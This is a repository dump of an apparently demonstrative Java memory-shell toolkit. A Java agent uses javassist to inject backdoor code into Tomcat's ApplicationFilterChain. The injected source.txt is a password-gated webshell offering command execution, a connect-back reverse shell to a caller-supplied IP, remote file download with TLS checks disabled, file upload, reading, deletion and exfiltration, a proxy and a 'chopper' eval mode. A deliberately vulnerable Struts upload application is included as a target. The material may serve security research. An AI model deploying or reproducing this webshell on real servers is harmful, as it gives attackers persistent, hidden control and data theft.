128 | 					result = result + (temp.isDirectory()?"r":"-") + "    " + temp.getName() + "   " + temp.length() + "\n";
129 | 				}
130 | 				else {
131 | 					result = result + (temp.isDirectory()?"r":"-")+ "    " + temp.getName() + "   " + temp.length() + "\n";
132 | 				}
133 | 			}
134 | 		} else {
135 | 			result = result + f.isDirectory() + "    " + f.getName() + "   " + f.length() + "\n";
136 | 		}
137 | 		return result;
138 | 	}
139 | 	public static String delete(String path) {
140 | 		String result = "";
141 | 		File f = new File(path);
142 | 		if (f.isDirectory()) {
143 | 			result = deleteDir(f)?"delete directory "+path+" successfully.":"delete "+path+" failed(maybe only some files are not deleted).";
144 | 		} else {
145 | 			result = f.delete()?"delete "+path+" successfully.":"delete "+path+" failed.";
146 | 		}
147 | 		return result;
148 | 	}
149 | 	public static String showFile(String path) throws Exception {
150 | 		StringBuffer result= new StringBuffer();
151 | 		File f = new File(path);
152 | 		if (f.exists()&&f.isFile()) {
153 |             FileReader reader = new FileReader(f);
154 |             BufferedReader br = new BufferedReader(reader);
155 |             String str = null;
156 |             while((str = br.readLine()) != null) {
157 |             	result.append(str+"\n");
158 |             }
159 |             br.close();
160 |             reader.close();
161 | 		} 
162 | 		return result.toString();
163 | 	}
164 | 	private static boolean deleteDir(File dir){
165 | 		boolean result=true;
166 | 		  if(dir.isDirectory()){
167 | 		   File[] files = dir.listFiles();
168 | 		   for(int i=0; i<files.length; i++) {
169 | 		    deleteDir(files[i]);
170 | 		   }
171 | 		  }
172 | 		 if (!dir.delete())
173 | 		 {
174 | 			 result=false;
175 | 		 }
176 | 		 return result;
177 | 		 }
178 | 	public static void download(String path) {
179 | 		/*File f = new File(path);
180 | 		if (f.isFile()) {
181 | 			String fileName = f.getName(); // 文件的默认保存名
182 | 			// 读到流中
183 | 			InputStream inStream = new FileInputStream(path);// 文件的存放路径
184 | 			// 设置输出的格式
185 | 			response.reset();
186 | 			response.setContentType("bin");
187 | 			response.addHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");
188 | 			// 循环取出流中的数据
189 | 			byte[] b = new byte[100];
190 | 			int len;
191 | 			try {
192 | 				while ((len = inStream.read(b)) > 0)
193 | 					response.getOutputStream().write(b, 0, len);
194 | 				inStream.close();
195 | 			} catch (IOException e) {
196 | 				e.printStackTrace();
197 | 			}
198 | 
199 | 		}*/
200 | 
201 | 	}
202 | 	public static String upload(String path,String fileContent,String type) throws Exception
203 | 	{
204 | 		FileOutputStream fos=new FileOutputStream(path);
205 | 		if (type.equalsIgnoreCase("a"))
206 | 		{
207 | 			fos.write(fileContent.getBytes());
208 | 			fos.flush();
209 | 		}
210 | 		else if(type.equalsIgnoreCase("b"))
211 | 		{
212 | 			fos.write(Base64.getDecoder().decode(fileContent));
213 | 		}
214 | 		fos.close();
215 | 		return "file " + path + " is upload successfully,and size is " + new File(path).length() + " Byte.";
216 | 	}
217 | 
218 | 	public static String urldownload(String url, String path) throws Exception {
219 | 		SSLContext sslcontext = SSLContext.getInstance("SSL", "SunJSSE");
220 | 		sslcontext.init(null, new TrustManager[] { new X509TrustManager() {
221 | 
222 | 			@Override
223 | 			public void checkClientTrusted(java.security.cert.X509Certificate[] arg0, String arg1)
224 | 					throws CertificateException {
225 | 				// TODO Auto-generated method stub
226 | 
227 | 			}
228 | 
229 | 			@Override
230 | 			public void checkServerTrusted(java.security.cert.X509Certificate[] arg0, String arg1)
231 | 					throws CertificateException {
232 | 				// TODO Auto-generated method stub
233 | 
234 | 			}
235 | 
236 | 			@Override
237 | 			public java.security.cert.X509Certificate[] getAcceptedIssuers() {
238 | 				// TODO Auto-generated method stub
239 | 				return null;
240 | 			}
241 | 
242 | 		} }, new java.security.SecureRandom());
243 | 		// URL url = new URL(url);
244 | 		HostnameVerifier ignoreHostnameVerifier = new HostnameVerifier() {
245 | 			public boolean verify(String s, SSLSession sslsession) {
246 | 				return true;
247 | 			}
248 | 		};
249 | 		HttpURLConnection urlCon;
250 | 		URL downloadUrl=new URL(url);
251 | 			HttpsURLConnection.setDefaultHostnameVerifier(ignoreHostnameVerifier);
252 | 			HttpsURLConnection.setDefaultSSLSocketFactory(sslcontext.getSocketFactory());
253 | 			urlCon = (HttpsURLConnection) downloadUrl.openConnection();
254 | 			urlCon.setConnectTimeout(6000);
255 | 			urlCon.setReadTimeout(6000);
256 | 			int code = urlCon.getResponseCode();
257 | 			if (code != HttpURLConnection.HTTP_OK) {
258 | 				throw new Exception("文件读取失败");
259 | 			}
260 | 			// 读文件流
261 | 			DataInputStream in = new DataInputStream(urlCon.getInputStream());
262 | 			DataOutputStream out = new DataOutputStream(new FileOutputStream(path));
263 | 			byte[] buffer = new byte[2048];
264 | 			int count = 0;
265 | 			while ((count = in.read(buffer)) > 0) {
266 | 				out.write(buffer, 0, count);
267 | 				out.flush();
268 | 			}
269 | 			out.close();
270 | 			in.close();
271 | 		return "file " + path + " downloaded successfully,and size is " + new File(path).length() + " Byte.";
272 | 	}
273 | 
274 | 	public static void main(String[] args) {
275 | 		try {
276 | 			// System.out.println(Shell.execute("net user").replace("\n", "aaaaaaaaaaa"));
277 | 		} catch (Exception e) {
278 | 			// TODO Auto-generated catch block
279 | 			e.printStackTrace();
280 | 		}
281 | 	}
282 | 
283 | 	public static void eval(ServletRequest request, ServletResponse response) throws Exception {
284 | 		/*
285 | 		 * Class c=Class.forName("javax/servlet/ServletRequest");
286 | 		 * System.out.println("classs is :"+c); Evaluate eval=new Evaluate();
287 | 		 * eval.doGet(request, response);
288 | 		 */
289 | 	}
290 | }
291 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Transformer.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell;
 2 | import java.io.BufferedReader;
 3 | import java.io.File;
 4 | import java.io.FileReader;
 5 | import java.io.InputStream;
 6 | import java.io.InputStreamReader;
 7 | import java.lang.instrument.ClassFileTransformer;
 8 | import java.lang.instrument.IllegalClassFormatException;
 9 | import java.security.ProtectionDomain;
10 | 
11 | import javassist.ClassClassPath;
12 | import javassist.ClassPool;
13 | import javassist.CtClass;
14 | import javassist.CtMethod;
15 | 
16 | public class Transformer implements ClassFileTransformer{
17 |     @Override
18 |     public byte[] transform(ClassLoader classLoader, String s, Class<?> aClass, ProtectionDomain protectionDomain, byte[] bytes) throws IllegalClassFormatException {
19 |     	
20 | 
21 |         if ("org/apache/catalina/core/ApplicationFilterChain".equals(s)) {
22 |             try {
23 |                 ClassPool cp = ClassPool.getDefault();
24 |                 ClassClassPath classPath = new ClassClassPath(aClass);  //get current class's classpath
25 |                 cp.insertClassPath(classPath);  //add the classpath to classpool
26 |                 CtClass cc = cp.get("org.apache.catalina.core.ApplicationFilterChain");
27 |                 CtMethod m = cc.getDeclaredMethod("internalDoFilter");
28 |                 m.addLocalVariable("elapsedTime", CtClass.longType);
29 |                 m.insertBefore(readSource());
30 |                 byte[] byteCode = cc.toBytecode();
31 |                 cc.detach();
32 |                 return byteCode;
33 |             } catch (Exception ex) {
34 |             	ex.printStackTrace();
35 |                 System.out.println("error:::::"+ex.getMessage());
36 |             }
37 |         }
38 | 
39 |         return null;
40 |     }
41 |     public String readSource() {
42 |     	StringBuilder source=new StringBuilder();
43 |         InputStream is = Transformer.class.getClassLoader().getResourceAsStream("source.txt");
44 |         InputStreamReader isr = new InputStreamReader(is); 
45 |         String line=null;
46 |         try {
47 |             BufferedReader br = new BufferedReader(isr);
48 |             while((line=br.readLine()) != null) {
49 |             	source.append(line);
50 |             }
51 |         } catch (Exception e) {
52 |             e.printStackTrace();
53 |         } 
54 |         return source.toString();
55 |     }
56 | }
57 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/source.txt:
--------------------------------------------------------------------------------
 1 | 	javax.servlet.http.HttpServletRequest request=$1;
 2 | 	javax.servlet.http.HttpServletResponse response = $2;
 3 | 	String pass_the_world=request.getParameter("pass_the_world");
 4 | 	String model=request.getParameter("model");
 5 | 	String result="";
 6 | 
 7 | try {
 8 | 			if (pass_the_world!=null&&pass_the_world.equals(net.rebeyond.memshell.Agent.password))
 9 | 			{
10 | 				if (model==null||model.equals(""))
11 | 				{
12 | 					result=net.rebeyond.memshell.Shell.help();
13 | 				}
14 | 				else if (model.equalsIgnoreCase("exec"))
15 | 				{
16 | 					String cmd=request.getParameter("cmd");
17 | 					result=net.rebeyond.memshell.Shell.execute(cmd);
18 | 				}
19 | 				else if (model.equalsIgnoreCase("connectback"))
20 | 				{
21 | 					String ip=request.getParameter("ip");
22 | 					String port=request.getParameter("port");
23 | 					result=net.rebeyond.memshell.Shell.connectBack(ip, port);
24 | 				}
25 | 				else if (model.equalsIgnoreCase("urldownload"))
26 | 				{
27 | 					String url=request.getParameter("url");
28 | 					String path=request.getParameter("path");
29 | 					result=net.rebeyond.memshell.Shell.urldownload(url, path);
30 | 				}
31 | 				else if (model.equalsIgnoreCase("list"))
32 | 				{
33 | 					String path=request.getParameter("path");
34 | 					result=net.rebeyond.memshell.Shell.list(path);
35 | 				}
36 | 				else if (model.equalsIgnoreCase("del"))
37 | 				{
38 | 					String path=request.getParameter("path");
39 | 					result=net.rebeyond.memshell.Shell.delete(path);
40 | 				}
41 | 				else if (model.equalsIgnoreCase("show"))
42 | 				{
43 | 					String path=request.getParameter("path");
44 | 					result=net.rebeyond.memshell.Shell.showFile(path);
45 | 				}
46 | 				else if (model.equalsIgnoreCase("download"))
47 | 				{
48 | 					String path=request.getParameter("path");
49 | 					java.io.File f = new java.io.File(path);
50 | 					if (f.isFile()) {
51 | 						String fileName = f.getName();
52 | 						java.io.InputStream inStream = new java.io.FileInputStream(path);
53 | 						response.reset();
54 | 						response.setContentType("bin");
55 | 						response.addHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");
56 | 						byte[] b = new byte[100];
57 | 						int len;
58 | 							while ((len = inStream.read(b)) > 0)
59 | 								response.getOutputStream().write(b, 0, len);
60 | 							inStream.close();
61 | 							return;
62 | 
63 | 					}
64 | 				}
65 | 				else if (model.equalsIgnoreCase("upload"))
66 | 				{
67 | 					String path=request.getParameter("path");
68 | 					String fileContent=request.getParameter("content");
69 | 					String type=request.getParameter("type");
70 | 					if (type==null||!type.equalsIgnoreCase("b"))
71 | 						type="a";
72 | 					result=net.rebeyond.memshell.Shell.upload(path, fileContent,type);
73 | 				}
74 | 				else if (model.equalsIgnoreCase("proxy"))
75 | 				{
76 | 					new net.rebeyond.memshell.Proxy().doProxy(request, response);
77 | 					return;
78 | 				}
79 | 				else if (model.equalsIgnoreCase("chopper"))
80 | 				{
81 | 					new net.rebeyond.memshell.Evaluate().doPost(request, response);
82 | 					return;
83 | 				}
84 | 				response.getWriter().print(result);
85 | 				return;
86 | 			}
87 | 			
88 | 		}
89 | 		catch(Exception e)
90 | 		{
91 | 			response.getWriter().print(e.getMessage());
92 | 		}
93 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/release/agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/release/agent.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/release/inject.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/release/inject.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/README.md:
--------------------------------------------------------------------------------
1 | 一个文件上传的漏洞环境。


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo.war


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/.idea/misc.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="JavaScriptSettings">
4 |     <option name="languageLevel" value="ES6" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/upload.iml" filepath="$PROJECT_DIR$/.idea/upload.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/.idea/upload.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="JAVA_MODULE" version="4">
3 |   <component name="NewModuleRootManager" inherit-compiler-output="true">
4 |     <exclude-output />
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/.idea/workspace.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <project version="4">
  3 |   <component name="ChangeListManager">
  4 |     <list default="true" id="c63b7cb2-a37c-4e22-af1c-e3e9f7acafef" name="Default Changelist" comment="" />
  5 |     <option name="SHOW_DIALOG" value="false" />
  6 |     <option name="HIGHLIGHT_CONFLICTS" value="true" />
  7 |     <option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
  8 |     <option name="LAST_RESOLUTION" value="IGNORE" />
  9 |   </component>
 10 |   <component name="LogFilters">
 11 |     <option name="FILTER_ERRORS" value="false" />
 12 |     <option name="FILTER_WARNINGS" value="false" />
 13 |     <option name="FILTER_INFO" value="true" />
 14 |     <option name="FILTER_DEBUG" value="true" />
 15 |     <option name="CUSTOM_FILTER" />
 16 |   </component>
 17 |   <component name="ProjectId" id="1dhblHXvrSjYh6g7QuFA1Ym2Z82" />
 18 |   <component name="ProjectViewState">
 19 |     <option name="hideEmptyMiddlePackages" value="true" />
 20 |     <option name="showExcludedFiles" value="true" />
 21 |     <option name="showLibraryContents" value="true" />
 22 |   </component>
 23 |   <component name="PropertiesComponent">
 24 |     <property name="RunOnceActivity.ShowReadmeOnStart" value="true" />
 25 |     <property name="WebServerToolWindowFactoryState" value="false" />
 26 |     <property name="aspect.path.notification.shown" value="true" />
 27 |     <property name="go.import.settings.migrated" value="true" />
 28 |     <property name="project.structure.last.edited" value="Libraries" />
 29 |     <property name="project.structure.proportion" value="0.0" />
 30 |     <property name="project.structure.side.proportion" value="0.2" />
 31 |     <property name="settings.editor.selected.configurable" value="preferences.pluginManager" />
 32 |   </component>
 33 |   <component name="RunManager">
 34 |     <configuration name="weblogic" type="WebLogic Instance" factoryName="Local" APPLICATION_SERVER_NAME="WebLogic 14.1.1.0.0" ALTERNATIVE_JRE_ENABLED="false">
 35 |       <option name="PORT" value="7001" />
 36 |       <option name="UPDATING_POLICY" value="restart-server" />
 37 |       <deployment>
 38 |         <file path="$PROJECT_DIR$/../upload.war">
 39 |           <settings DEPLOYMENT_METHOD="Weblogic.Deployer">
 40 |             <option name="CHECK_EJB_CMP_DATASOURCES" value="true" />
 41 |             <option name="AS_LIBRARY" value="false" />
 42 |             <option name="PLAN" />
 43 |           </settings>
 44 |         </file>
 45 |       </deployment>
 46 |       <server-settings>
 47 |         <option name="DOMAIN_PATH" value="$USER_HOME$/Oracle/Middleware/Oracle_Home/user_projects/domains/wl_server" />
 48 |         <option name="SERVER_NAME" value="AdminServer" />
 49 |         <option name="DOMAIN_NAME" value="wl_server" />
 50 |         <option name="ADMIN_SERVER_HOST" value="localhost" />
 51 |         <option name="ADMIN_SERVER_PORT" value="7001" />
 52 |         <option name="TARGET_TYPE_NAME" value="TYPE_SERVER" />
 53 |         <option name="CLUSTER_NAME" value="mycluster" />
 54 |         <option name="CONNECT_TO_MANAGED_SERVER" value="false" />
 55 |         <option name="USERNAME" value="weblogic" />
 56 |         <option name="CREDENTIAL_ALIAS" value="271d5f70-51c9-4498-b261-f707aadf58a2" />
 57 |       </server-settings>
 58 |       <predefined_log_file enabled="true" id="WEBLOGIC_SERVER_LOG_FILE" />
 59 |       <predefined_log_file enabled="true" id="WEBLOGIC_DOMAIN_LOG_FILE" />
 60 |       <RunnerSettings RunnerId="Debug">
 61 |         <option name="DEBUG_PORT" value="50413" />
 62 |       </RunnerSettings>
 63 |       <ConfigurationWrapper VM_VAR="JAVA_OPTIONS" RunnerId="Cover">
 64 |         <option name="USE_ENV_VARIABLES" value="true" />
 65 |         <STARTUP>
 66 |           <option name="USE_DEFAULT" value="true" />
 67 |           <option name="SCRIPT" value="" />
 68 |           <option name="VM_PARAMETERS" value="" />
 69 |           <option name="PROGRAM_PARAMETERS" value="" />
 70 |         </STARTUP>
 71 |         <SHUTDOWN>
 72 |           <option name="USE_DEFAULT" value="true" />
 73 |           <option name="SCRIPT" value="" />
 74 |           <option name="VM_PARAMETERS" value="" />
 75 |           <option name="PROGRAM_PARAMETERS" value="" />
 76 |         </SHUTDOWN>
 77 |       </ConfigurationWrapper>
 78 |       <ConfigurationWrapper VM_VAR="JAVA_OPTIONS" RunnerId="Debug">
 79 |         <option name="USE_ENV_VARIABLES" value="true" />
 80 |         <STARTUP>
 81 |           <option name="USE_DEFAULT" value="true" />
 82 |           <option name="SCRIPT" value="" />
 83 |           <option name="VM_PARAMETERS" value="" />
 84 |           <option name="PROGRAM_PARAMETERS" value="" />
 85 |         </STARTUP>
 86 |         <SHUTDOWN>
 87 |           <option name="USE_DEFAULT" value="true" />
 88 |           <option name="SCRIPT" value="" />
 89 |           <option name="VM_PARAMETERS" value="" />
 90 |           <option name="PROGRAM_PARAMETERS" value="" />
 91 |         </SHUTDOWN>
 92 |       </ConfigurationWrapper>
 93 |       <ConfigurationWrapper VM_VAR="JAVA_OPTIONS" RunnerId="Run">
 94 |         <option name="USE_ENV_VARIABLES" value="true" />
 95 |         <STARTUP>
 96 |           <option name="USE_DEFAULT" value="true" />
 97 |           <option name="SCRIPT" value="" />
 98 |           <option name="VM_PARAMETERS" value="" />
 99 |           <option name="PROGRAM_PARAMETERS" value="" />
100 |         </STARTUP>
101 |         <SHUTDOWN>
102 |           <option name="USE_DEFAULT" value="true" />
103 |           <option name="SCRIPT" value="" />
104 |           <option name="VM_PARAMETERS" value="" />
105 |           <option name="PROGRAM_PARAMETERS" value="" />
106 |         </SHUTDOWN>
107 |       </ConfigurationWrapper>
108 |       <method v="2">
109 |         <option name="Make" enabled="true" />
110 |       </method>
111 |     </configuration>
112 |   </component>
113 |   <component name="ServiceViewManager">
114 |     <option name="viewStates">
115 |       <list>
116 |         <serviceView>
117 |           <treeState>
118 |             <expand>
119 |               <path>
120 |                 <item name="services root" type="e789fda9:ObjectUtils$Sentinel" />
121 |                 <item name="WebLogic Server" type="7427dc5b:ServiceModel$ServiceGroupNode" />
122 |               </path>
123 |               <path>
124 |                 <item name="services root" type="e789fda9:ObjectUtils$Sentinel" />
125 |                 <item name="WebLogic Server" type="7427dc5b:ServiceModel$ServiceGroupNode" />
126 |                 <item name="Running" type="7427dc5b:ServiceModel$ServiceGroupNode" />
127 |               </path>
128 |             </expand>
129 |             <select />
130 |           </treeState>
131 |         </serviceView>
132 |       </list>
133 |     </option>
134 |   </component>
135 |   <component name="SvnConfiguration">
136 |     <configuration />
137 |   </component>
138 |   <component name="TaskManager">
139 |     <task active="true" id="Default" summary="Default task">
140 |       <changelist id="c63b7cb2-a37c-4e22-af1c-e3e9f7acafef" name="Default Changelist" comment="" />
141 |       <created>1592880529734</created>
142 |       <option name="number" value="Default" />
143 |       <option name="presentableId" value="Default" />
144 |       <updated>1592880529734</updated>
145 |       <workItem from="1592880530976" duration="2580000" />
146 |     </task>
147 |     <servers />
148 |   </component>
149 |   <component name="TypeScriptGeneratedFilesManager">
150 |     <option name="version" value="1" />
151 |   </component>
152 |   <component name="WindowStateProjectService">
153 |     <state x="353" y="70" key="#WebLogic_Server" timestamp="1592881788387">
154 |       <screen x="0" y="0" width="1440" height="900" />
155 |     </state>
156 |     <state x="353" y="70" key="#WebLogic_Server/0.0.1440.900@0.0.1440.900" timestamp="1592881788387" />
157 |     <state x="184" y="112" key="#com.intellij.execution.impl.EditConfigurationsDialog" timestamp="1592884279759">
158 |       <screen x="0" y="0" width="1440" height="900" />
159 |     </state>
160 |     <state x="184" y="112" key="#com.intellij.execution.impl.EditConfigurationsDialog/0.0.1440.900@0.0.1440.900" timestamp="1592884279759" />
161 |     <state x="332" y="81" width="826" height="737" key="#weblogic" timestamp="1592881790262">
162 |       <screen x="0" y="0" width="1440" height="900" />
163 |     </state>
164 |     <state x="332" y="81" width="826" height="737" key="#weblogic/0.0.1440.900@0.0.1440.900" timestamp="1592881790262" />
165 |     <state width="958" height="245" key="GridCell.Tab.0.bottom" timestamp="1592884487409">
166 |       <screen x="0" y="23" width="1440" height="877" />
167 |     </state>
168 |     <state width="958" height="245" key="GridCell.Tab.0.bottom/0.0.1440.900@0.0.1440.900" timestamp="1592884021188" />
169 |     <state width="958" height="245" key="GridCell.Tab.0.bottom/0.23.1440.877@0.23.1440.877" timestamp="1592884487409" />
170 |     <state width="958" height="245" key="GridCell.Tab.0.center" timestamp="1592884487407">
171 |       <screen x="0" y="23" width="1440" height="877" />
172 |     </state>
173 |     <state width="958" height="245" key="GridCell.Tab.0.center/0.0.1440.900@0.0.1440.900" timestamp="1592884021187" />
174 |     <state width="958" height="245" key="GridCell.Tab.0.center/0.23.1440.877@0.23.1440.877" timestamp="1592884487407" />
175 |     <state width="958" height="245" key="GridCell.Tab.0.left" timestamp="1592884487400">
176 |       <screen x="0" y="23" width="1440" height="877" />
177 |     </state>
178 |     <state width="958" height="245" key="GridCell.Tab.0.left/0.0.1440.900@0.0.1440.900" timestamp="1592884021186" />
179 |     <state width="958" height="245" key="GridCell.Tab.0.left/0.23.1440.877@0.23.1440.877" timestamp="1592884487400" />
180 |     <state width="958" height="245" key="GridCell.Tab.0.right" timestamp="1592884487408">
181 |       <screen x="0" y="23" width="1440" height="877" />
182 |     </state>
183 |     <state width="958" height="245" key="GridCell.Tab.0.right/0.0.1440.900@0.0.1440.900" timestamp="1592884021187" />
184 |     <state width="958" height="245" key="GridCell.Tab.0.right/0.23.1440.877@0.23.1440.877" timestamp="1592884487408" />
185 |     <state width="958" height="245" key="GridCell.Tab.1.bottom" timestamp="1592884487411">
186 |       <screen x="0" y="23" width="1440" height="877" />
187 |     </state>
188 |     <state width="958" height="245" key="GridCell.Tab.1.bottom/0.0.1440.900@0.0.1440.900" timestamp="1592884021190" />
189 |     <state width="958" height="245" key="GridCell.Tab.1.bottom/0.23.1440.877@0.23.1440.877" timestamp="1592884487411" />
190 |     <state width="958" height="245" key="GridCell.Tab.1.center" timestamp="1592884487410">
191 |       <screen x="0" y="23" width="1440" height="877" />
192 |     </state>
193 |     <state width="958" height="245" key="GridCell.Tab.1.center/0.0.1440.900@0.0.1440.900" timestamp="1592884021189" />
194 |     <state width="958" height="245" key="GridCell.Tab.1.center/0.23.1440.877@0.23.1440.877" timestamp="1592884487410" />
195 |     <state width="958" height="245" key="GridCell.Tab.1.left" timestamp="1592884487409">
196 |       <screen x="0" y="23" width="1440" height="877" />
197 |     </state>
198 |     <state width="958" height="245" key="GridCell.Tab.1.left/0.0.1440.900@0.0.1440.900" timestamp="1592884021189" />
199 |     <state width="958" height="245" key="GridCell.Tab.1.left/0.23.1440.877@0.23.1440.877" timestamp="1592884487409" />
200 |     <state width="958" height="245" key="GridCell.Tab.1.right" timestamp="1592884487410">
201 |       <screen x="0" y="23" width="1440" height="877" />
202 |     </state>
203 |     <state width="958" height="245" key="GridCell.Tab.1.right/0.0.1440.900@0.0.1440.900" timestamp="1592884021190" />
204 |     <state width="958" height="245" key="GridCell.Tab.1.right/0.23.1440.877@0.23.1440.877" timestamp="1592884487410" />
205 |   </component>
206 | </project>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/META-INF/war-tracker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/META-INF/war-tracker


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/DownAction.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/DownAction.class


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/UploadAction.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/UploadAction.class


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/UploadMoreAction.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/action/UploadMoreAction.class


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/classes/struts.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" ?>
 2 | <!DOCTYPE struts PUBLIC
 3 |         "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
 4 |         "http://struts.apache.org/dtds/struts-2.3.dtd">
 5 | 
 6 | <struts>
 7 |         <package name="upload" extends="struts-default">
 8 |             <action name="upload" class="action.UploadAction" method="upload">
 9 |                 <result name="success">/success.jsp</result>
10 |             </action>
11 | 
12 |             <action name="uploadMore" class="action.UploadMoreAction" method="uploadMore">
13 |                 <result name="success">/success.jsp</result>
14 |             </action>
15 | 
16 |             <action name="down" class="action.DownAction" method="down">
17 |                 <result name="success" type="stream">
18 |                     <!--给Stream的结果类型注入参数-->
19 |                     <param name="contentType">application/octet-stream</param>
20 |                     <!--告知客户端 以下载的方式打开-->
21 |                     <param name="contentDisposition">attachment;filename=2.jpg</param>
22 |                     <!--给流参数赋值-->
23 |                     <param name="inputName">inputStream</param>
24 |                 </result>
25 |             </action>
26 |         </package>
27 | </struts>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-fileupload-1.3.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-fileupload-1.3.1.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-io-2.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-io-2.2.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-lang3-3.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/commons-lang3-3.2.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/freemarker-2.3.19.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/freemarker-2.3.19.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/javassist-3.11.0.GA.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/javassist-3.11.0.GA.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/ognl-3.0.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/ognl-3.0.6.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/struts2-core-2.3.20.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/struts2-core-2.3.20.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/struts2-json-plugin-2.3.20.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/struts2-json-plugin-2.3.20.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/xwork-core-2.3.20.jar:
--------------------------------------------------------------------------------
